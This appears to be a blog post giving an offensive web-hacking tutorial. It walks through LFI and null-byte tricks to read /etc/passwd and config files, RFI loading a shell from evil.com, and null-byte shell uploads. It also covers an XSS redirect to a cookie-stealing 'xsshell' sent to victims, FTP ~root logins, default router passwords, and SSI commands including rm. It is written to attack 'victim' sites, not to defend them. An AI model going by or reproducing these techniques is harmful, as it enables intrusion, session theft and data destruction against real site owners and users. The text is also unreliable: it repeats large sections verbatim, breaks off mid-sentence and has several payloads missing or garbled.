Today I will be showing you many, many, flaws on an internal server, we will go through PHP Attacks, Java attacks, and URL manipulation.
Lets start with URL manipulation, shall we?
URL Manipulation
Well, lets say you find a login for a certain website.
Go ahead and view the source.
If you see anything familiar to:
index.php?file=login.php
Then that is the PHP file representing login.php, here is an example of how the URL may look like:
http://www.target.com/admin/index.php?file=login.php
Once we go there it will probably forbid access because we did not enter anything and we do not have any SESSION id given by the server.
But don't you see anything suspicious on the page that is functioning (index.php?file=login.php) Well, if you see anything cached on that page such as: password.php, your in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the Administrator Username and Password, and it has no encryption in any format whatsoever (MD5, SHA1, etc)
But the Administrators can go further to protect them selves, but there are more manipulations. Lets continue on to them?
Null Byte Includes
Now, on our last URL manipulation, we got access to the admin site, and while reviewing the source we found:
index.php?file=login.php
Which featured us the password.php motive which told us that if we replaced login.php with password.php it will feature the administrative USR and PWD without any encryption (md5, sha1, etc).
But, what if the administrators have knowledge and are smarter, but what they think is that LFI, is LFI, and if its original form doesn't work, it would never work. But that is totally wrong. You can use Null Byte includes to gain knowledge in the PHP/CGI source that is representing that file.
So basically lets say that password.php was forbidden for outside users, here is a sample of that content:
index.php?file=password.php
It featured content showing the password without any encryption.
But once you go to it, your forbidden, but this can be changed by adding a Null Byte include. Here is how it would look:
index.php?file=password.php
That poisoned null byte gives us the ability to view the source of that .PHP file thus giving us the password for the administrative user account.
This can be used for other destruction such as viewing config.php, /etc/passwd, etc.
Null Byte Upload
Lets say you make an attempt to upload a shell on some website, but it replies back with an error claiming it only accepts JPG, PNG, etc.
Well most of you would say "Ugh ill just give up"
And others would say "I will just rename my shell to ShellName.php.jpg"
Both are wrong.
You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? Its really simple, follow this steps to determine your question:
1. Open Notepad
2. Copy and Paste your PHP Shell
3. File >> Save as >> shellname.php.jpg
4. Upload to the server
Our null byte () adds a URL -Encoded format into .jpg thus giving back our file (in most cases your shell).
LFI Tutorial
LFI Represents Local File Inclusion, it is basically a URL transverse, here is an example of an LFI code:
victim.com/index.php?page=../../../../../../../etc/passwd
And here is an example of a vulnerable code:
$page = $_GET[page];
include($page);
?>
That PHP script should never be used, because $page is passed directly on the webpage.
And the LFI code represents what can happen if your $page is written like that.
the ../'s you see are called URL transversal, they let you serve anywhere around the server using characters that represent UP, Down, etc.
Lets move on to the LFI script itself and play around with it for a bit.
victim.com/index.php?page=../../../../../../../etc/passwd
What that does is goes up to the directory /etc/passwd.
/etc/passwd is a representation for a Linux box featuring its encrypted password, just like Windows has its own encrypted passwd function (SAM) Unix has it as well.
Once they gain access to that directory, they have the ability to view users, and crack the encoded password via Brute-Force.
But sometimes Administrators can be smart, and this is where the poisoned null byte comes in hand, if you cannot access /etc/passwd, it eventually means that the Administrator progressed something into it.
So you can try:
victim.com/index.php?page=../../../../../../../etc/passwd
You can use a poison null byte due to the fact that sometimes Admins try to add something like .php.txt etc to make it harder for you to gain access to the file.
Fortunately you can easily bypass this using the poison null-byte.
RFI Tutorial
RFI is most commonly used to transmit a shell to a web server but its actually not uploaded, it is just an appearance on the web server itself.
RFI can be used for plenty of things, transmitting password loggers, etc. But its commonly used for its brilliant ability to store a shell.
Now if your not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to mysql, and find private files the server has stored on there web server.
How can this be a bad thing for you? They can leak an entire db leak using there access in MySQL, this db can feature usernames, passwords, emails, etc.
They can gain access to ANYTHING. Here is an example of an RFI attempt:
http://www.victim.com/index.php?page=htt...shell.txt?
That tells the web server to go to the page of http://www.evil.com/shell.txt
and how will it work you may be asking yourself, well it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.
We need to add the ? due to the fact that its basically like a URL transversal thing but its really not it just points at that directory (http://www.evil.com/shell.txt).
XSS
XSS is used a lot on search engines, it can also be used to point at an xsshell.
But first, lets play around with Javascript. Find yourself a search-box, and try typing this in:
That makes an alert textbox featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS
You may be saying, is this only possible in Javascript? No, there are HTML Injections, which look familiar to this:
Lets start with URL manipulation, shall we?
URL Manipulation
Well, lets say you find a login for a certain website.
Go ahead and view the source.
If you see anything familiar to:
index.php?file=login.php
Then that is the PHP file representing login.php, here is an example of how the URL may look like:
http://www.target.com/admin/index.php?file=login.php
Once we go there it will probably forbid access because we did not enter anything and we do not have any SESSION id given by the server.
But don't you see anything suspicious on the page that is functioning (index.php?file=login.php) Well, if you see anything cached on that page such as: password.php, your in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the Administrator Username and Password, and it has no encryption in any format whatsoever (MD5, SHA1, etc)
But the Administrators can go further to protect them selves, but there are more manipulations. Lets continue on to them?
Null Byte Includes
Now, on our last URL manipulation, we got access to the admin site, and while reviewing the source we found:
index.php?file=login.php
Which featured us the password.php motive which told us that if we replaced login.php with password.php it will feature the administrative USR and PWD without any encryption (md5, sha1, etc).
But, what if the administrators have knowledge and are smarter, but what they think is that LFI, is LFI, and if its original form doesn't work, it would never work. But that is totally wrong. You can use Null Byte includes to gain knowledge in the PHP/CGI source that is representing that file.
So basically lets say that password.php was forbidden for outside users, here is a sample of that content:
index.php?file=password.php
It featured content showing the password without any encryption.
But once you go to it, your forbidden, but this can be changed by adding a Null Byte include. Here is how it would look:
index.php?file=password.php
That poisoned null byte gives us the ability to view the source of that .PHP file thus giving us the password for the administrative user account.
This can be used for other destruction such as viewing config.php, /etc/passwd, etc.
Null Byte Upload
Lets say you make an attempt to upload a shell on some website, but it replies back with an error claiming it only accepts JPG, PNG, etc.
Well most of you would say "Ugh ill just give up"
And others would say "I will just rename my shell to ShellName.php.jpg"
Both are wrong.
You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? Its really simple, follow this steps to determine your question:
1. Open Notepad
2. Copy and Paste your PHP Shell
3. File >> Save as >> shellname.php.jpg
4. Upload to the server
Our null byte () adds a URL -Encoded format into .jpg thus giving back our file (in most cases your shell).
LFI Tutorial
LFI Represents Local File Inclusion, it is basically a URL transverse, here is an example of an LFI code:
victim.com/index.php?page=../../../../../../../etc/passwd
And here is an example of a vulnerable code:
$page = $_GET[page];
include($page);
?>
That PHP script should never be used, because $page is passed directly on the webpage.
And the LFI code represents what can happen if your $page is written like that.
the ../'s you see are called URL transversal, they let you serve anywhere around the server using characters that represent UP, Down, etc.
Lets move on to the LFI script itself and play around with it for a bit.
victim.com/index.php?page=../../../../../../../etc/passwd
What that does is goes up to the directory /etc/passwd.
/etc/passwd is a representation for a Linux box featuring its encrypted password, just like Windows has its own encrypted passwd function (SAM) Unix has it as well.
Once they gain access to that directory, they have the ability to view users, and crack the encoded password via Brute-Force.
But sometimes Administrators can be smart, and this is where the poisoned null byte comes in hand, if you cannot access /etc/passwd, it eventually means that the Administrator progressed something into it.
So you can try:
victim.com/index.php?page=../../../../../../../etc/passwd
You can use a poison null byte due to the fact that sometimes Admins try to add something like .php.txt etc to make it harder for you to gain access to the file.
Fortunately you can easily bypass this using the poison null-byte.
RFI Tutorial
RFI is most commonly used to transmit a shell to a web server but its actually not uploaded, it is just an appearance on the web server itself.
RFI can be used for plenty of things, transmitting password loggers, etc. But its commonly used for its brilliant ability to store a shell.
Now if your not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to mysql, and find private files the server has stored on there web server.
How can this be a bad thing for you? They can leak an entire db leak using there access in MySQL, this db can feature usernames, passwords, emails, etc.
They can gain access to ANYTHING. Here is an example of an RFI attempt:
http://www.victim.com/index.php?page=htt...shell.txt?
That tells the web server to go to the page of http://www.evil.com/shell.txt
and how will it work you may be asking yourself, well it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.
We need to add the ? due to the fact that its basically like a URL transversal thing but its really not it just points at that directory (http://www.evil.com/shell.txt).
XSS
XSS is used a lot on search engines, it can also be used to point at an xsshell.
But first, lets play around with Javascript. Find yourself a search-box, and try typing this in:
That makes an alert textbox featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS
You may be saying, is this only possible in Javascript? No, there are HTML Injections, which look familiar to this:
sup
If you get the (sup) back, it is also vulnerable to HTML injection.
But we are focusing on Javascript. Lets say we wanted to point a bitch at our xsshell we created which logs cookies. We can do this using this simple javascript script:
<(meta) content="0;url=http://www.yourxsshell.com/attack.php" http-equiv="refresh">
That uses meta to redirect to your xsshell.
Here is an example of how that may look after its encoded (this uses google.com as an example)
http://www.lapdonline.org/search_results...rch_terms=
There you go, it is encoded.
What you want to is redirect it to your XSSHell, so you might need to modify my example.
Download xsshell (includes info etc)
http://www.darknet.org.uk/2006/12/xss-sh...door-tool/
Now once you send that XSS'd link to somebody which includes your xsshell you will log all of their cookies, ses id's, etc.
You can even put a Trojan download instead of an XSShell, but you have to make it look well-thought out.
FTP Hacking
FTP is the File Transfer Protocol on a web server, it is used to store files, view files, etc.
But there is a root account that contains all the permission, we don't have root and it would probably take forever to do a Brute-Force on the account.
So a trick is to do the following:
1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Then once your done with that type in: quote user ftp
then type in quote cwd ~root
then type in quote pass ftp
That quotes the user account FTP
Then it quotes the cwd of ~root
Don't expect this to work on every website, some websites have anonymous login disabled meaning this won't work as much as you expected it to .
Robots.txt destruction:
Robots.txt is a text file that is used to control spiders that visit your website. This file grants access to certain folders, file types, and specific files depending on the robot accessing the site.
Here is an example of Robots.txt:
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/
Also, theUser-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/
Disalow: /admin/
This can be used as a URL transversal method.
Here is an example of how it may look like:
http://www.host.com/disallowed directory/RandomLeters&symbols
Well, after you get a 404 ERROR page, you should see something like /../
You may notice that from our LFI explanation, /../ is used to transmit to other directories, well in this case giving us access to the disallowed directories that are formed in Robots.txt. For example
http://www.host.com/disallowed directory/Abunchofrandomletters&symbols/../admin/
But do NOT expect this to work on every single website that has Robots.txt
PPPoE Exposure
A method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.
But sometimes even hosts do not have PPP tunneled (if they have it on there network).
PPP can used in telnet, so that is what we will we be focusing on.
First, you want to do an nmap scan via:
nmap -v -A host.com
And you will need to wait until it is finished, we will need to see what OS this runs under, this will give us loads of information such as possible router info.
So after its done you might want to go to google and search:
Router-Name Default Password
Because in telnet, the PPPoE password is usually defaulted.
So for example, if it prompts you for the user and password, you can try:
Admin
Password
Now, once your in. You can cd to directories and view dirs, the /var section includes ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that included CWMP, ACS, and possible POP information.
If however you cannot get PPPoE access, you can run a Brute-Force attack, or you can try accessing certain directories such as cwmp.host.com, usually the sites are put under https because they think its a high-level of encryption so its harder to crack, but the password for that can be easily prompted by using useragent vulnerables, cookie spoofing, and also FTP vulnerabilities which were discussed in our previous tutorial on Web Hacking.
The FTP Vulnerabilities we discussed will get you on a very high level because it may include db's, configs, etc.
Serverside Includes (Evil SSI)
The most common way to to find one of these vulnerabilities are to simply use a search box. Serverside Includes are basically abilities to view directories.. Just so I can explain it in a more efficient way, lets say your in the directory /admin, and you have a search field, and your wondering what else is in the /admin directory, well you can simply use this :
ls is a command used to display directories, and cmd is basically a Command Prompt.
After we get a reply displayed along with directories, we can use rm to remove directories, example:
We can do a lot of things, but these are just set examples.
0 comments:
Post a Comment